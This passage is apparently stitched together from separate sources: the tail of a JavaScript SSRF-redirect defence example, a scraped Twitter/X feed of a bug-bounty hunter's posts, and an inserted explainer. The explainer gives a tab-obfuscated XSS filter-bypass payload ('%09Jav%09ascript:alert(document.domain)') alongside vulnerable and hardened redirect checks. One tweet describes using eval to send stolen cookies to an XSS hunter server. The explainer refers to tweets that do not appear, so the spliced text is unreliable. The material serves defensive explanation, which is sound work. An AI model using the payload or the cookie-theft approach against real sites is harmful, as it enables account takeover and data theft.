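// Follow redirects by hand and re-check every hop; a shortener is just a redirect to a blocked host.
// `fetchImpl(url) -> {status, location?, body?}` is injected so the logic runs offline.
function safeFetch(rawUrl, fetchImpl, maxHops = 3) {
  let url = rawUrl;
  for (let hop = 0; hop <= maxHops; hop++) {
    if (isPrivateTarget(url)) return { blocked: true, url };
    const res = fetchImpl(url);
    if (res.status >= 300 && res.status < 400 && res.location) {
      url = new URL(res.location, url).href;                       // resolve relative Location headers
      continue;
    }
    return { blocked: false, url, status: res.status, body: res.body };
  }
  return { blocked: true, url, reason: "too many redirects" };
}

// Constructed mock: a shortener that 302s to localhost, and an ordinary public page.
function mockFetch(url) {
  if (url === "https://short.example/x") return { status: 302, location: "http://localhost:8080/admin" };
  if (url.startsWith("http://localhost")) return { status: 200, body: "internal admin" };
  return { status: 200, body: "public" };
}
```

The string blocklist lets `http://127.1/` through while the parsed check blocks it, and the shortener is stopped at the second hop. Two caveats the example does not cover: a public hostname can resolve to a private address (or change its answer between check and connect), so a production filter resolves the name itself, checks every returned address, and connects to the address it checked; and IPv6 mapped forms such as `::ffff:127.0.0.1` need the same treatment as their IPv4 equivalents.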
@moblig_
Moblig
2 years
I hate it when you work for hours investigating and escalating an XSS just for a stupid program to tell you "We take XSS as Medium severity, we have the final word" fucking put it on your brief then so I don't waste my time🙄 #bugbounty
0
0
14
@moblig_
Moblig
2 years
@ibug___ @theXSSrat @stokfredrik Bypassing the 403 is a vuln by itself but it has to be accompanied by a good PoC, example: accessing sensitive files stored in the server like web.config or nginx.conf. I personally like this 403 Bypass script because I can add my own patterns
1
2
14
@moblig_
Moblig
2 years
@ManasH4rsh Cherish that feeling you get from your first bounty, you'll never experience the same again!
0
0
13
@moblig_
Moblig
3 years
Proud to end the year off by being the #1 Hacker in Mexico’s @Hacker0x01 leaderboard for 15 months straight! #TogetherWeHitHarder
0
1
12
@moblig_
Moblig
27 days
@voorivex @Hacker0x01 You are absolutely correct, this was an oversight on my part as I took the code after the fix was pushed, the original code did not match for whitespace characters, only for the javascript string, this was the original line: var n = decodeURI(t.modal.getUrlParam('onmodalexit'));
0
1
13
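The `%09Jav%09ascript:` bypass from the $4,500 and "bypass the fix" tweets and the pre-fix line quoted in the reply above, as an added example that is not the program's code: a redirect check in the shape the reply describes (decode the parameter, then look for the literal `javascript` string), what the browser actually does with the same value, and a hardened check. The parameter handling, the application origin and the helper names are assumptions.

```javascript
// Pre-fix shape: decode, then reject only if the literal scheme string is present.
function vulnerableIsSafeRedirect(rawParam) {
  let n;
  try { n = decodeURI(rawParam); } catch { return false; }   // malformed %-sequence: reject
  return !/javascript:/i.test(n);                             // "\tJav\tascript:" is not matched
}

// Browser view of the same string: the WHATWG URL parser (Node's URL follows it) strips ASCII
// tab, LF and CR anywhere in the input and lowercases the scheme before it is interpreted.
function browserProtocol(rawParam, base = "https://app.example") {
  try { return new URL(decodeURI(rawParam), base).protocol; } catch { return null; }
}

// Hardened: parse exactly as the browser will, then allow-list the scheme and the origin.
function hardenedIsSafeRedirect(rawParam, allowedOrigin = "https://app.example") {
  let u;
  try { u = new URL(decodeURI(rawParam), allowedOrigin); } catch { return false; }
  return u.protocol === "https:" && u.origin === allowedOrigin;
}

const PAYLOAD = "%09Jav%09ascript:alert(document.domain)";   // the tweet's payload, as received
```

`decodeURI` turns `%09` into a tab, the string check does not see `javascript:`, and the browser then discards the tabs and runs it; `%0a` and `%0d` behave the same way, which is why matching "whitespace" is still the wrong fix. Parsing with the same rules the browser uses and comparing the resulting `origin` also catches `//evil.example/x` and absolute URLs to other hosts.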
@moblig_
Moblig
3 years
@campuscodi It's called retaliation lol props to the Nvidia team
0
0
12
@moblig_
Moblig
7 months
Does anyone know if you can invite a collaborator to a report in a private program, even if the collaborator is not part of the program? #bugbounty
8
1
13
@moblig_
Moblig
2 years
Uber breach looks bad🥶
1
1
11
@moblig_
Moblig
1 year
@_jayesh_7 Check out this Tweet
@moblig_
Moblig
2 years
Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! For a Critical Severity IDOR. Tip: 1) In-depth knowledge of the program, lots of manual testing 2) Learning to master the 'Autorize' extension for Burp Automated & manual testing🤝 #bugbountytip #hackerone
26
72
687
0
0
11
@moblig_
Moblig
3 years
Thanks @Hacker0x01 for the awesome swag!
0
1
13
@moblig_
Moblig
28 days
@MiniMjStar @Hacker0x01 Check out this guide: If you have any more doubts after reading this, let me know
1
0
11
@moblig_
Moblig
2 years
@disnhau @rhetoric_URBAN @Hacker0x01 Exactly, created a script using the eval function, the script called my XSS hunter server which stole cookies and sensitive data
1
0
10
@moblig_
Moblig
2 years
If it wasn’t because of private bug bounty programs I would now have 15+ CVE’s to my name, bounty amounts are very good but sometimes I think CVE’s would be better, what would you prefer?
CVE's
36
Bounties 💸
183
3
0
11
@moblig_
Moblig
3 years
@_Base_64 After bypassing the WAF I was able to achieve XSS and CSRF, didn't report them separately because I had to prove impact on the WAF bypass and they were low impact vulns
1
0
11
@moblig_
Moblig
2 years
Do you actually think #ethicalhacking has gotten to the point where we are a problem for blackhats? Like, do they wake up in the morning and say "Man I hate bug bounty hunters" #bugbounty
Yes
54
No
62
I'm a black hat
25
4
0
9
@moblig_
Moblig
2 years
Context: The vulnerability allows an attacker to view private Github/Gitlab repos, even if Gitlab is behind VPN All reports were evaluated by triagers, not by the company. The bugcrowd triager closed it 3 minutes after I reported and just gave me the standard "N/A" message
3
0
10
@moblig_
Moblig
3 years
Check out my 2021 Year In Review on @Hacker0x01 : ! #TogetherWeHitHarder
1
1
9
@moblig_
Moblig
3 months
Anyone interested?😂
9
1
10
@moblig_
Moblig
2 years
@dvrahmr Ur lucky, most programs tell you to stop reporting because "we acknowledge we have a problem with XSS" and then pay you a Medium bounty for an XSS leading to ATO, be grateful!
2
0
10
@moblig_
Moblig
2 years
@iamrobot321 @Hacker0x01 I used a wordlist from Github and then added my custom endpoints :)
1
0
9
@moblig_
Moblig
3 years
@xnwup Well that's my point, that money was earned waaayy before the sanctions, you could make a case with H1 support
1
0
8
@moblig_
Moblig
2 years
@InsiderPhD It's called scraping the bottom of the barrel lol beg bounty
2
0
9
@moblig_
Moblig
3 years
@Toys4BDSM @campuscodi Good observation, agree.
0
0
8
@moblig_
Moblig
9 months
@GhimireVeshraj Fight this, open a mediation request. We shouldn't be getting fucked over by inexperienced triagers
0
0
8
@moblig_
Moblig
5 months
@Burp_Suite Can this be an optional feature that you can turn on/off? I find it similar to how Caido queues requests and I hate that
2
0
5
@moblig_
Moblig
3 months
I think some people are missing the point here, it's not about having a clean sheet and no N/A's, I had a couple myself; many new bug bounty hunters 'spray and pray,' sending many low-quality reports hoping one hits. This wastes a lot of effort and will later reflect badly on u
@PikuHaku
Eldar
3 months
Bug bounty programs are not ur personal training ground to spam with NA reports until u learn. Go play CTFs, do portswigger's and pentesterlab's exercises. Build ur own website and break it. There are a billion ways to learn without wasting everyone's time.
10
13
143
3
0
9
@moblig_
Moblig
2 years
@0099gaurav But Autorize sends 3 requests by default, 1 is the original, 2 is the modified request, 3 is the unauthenticated request. You must be configuring it wrong
1
0
8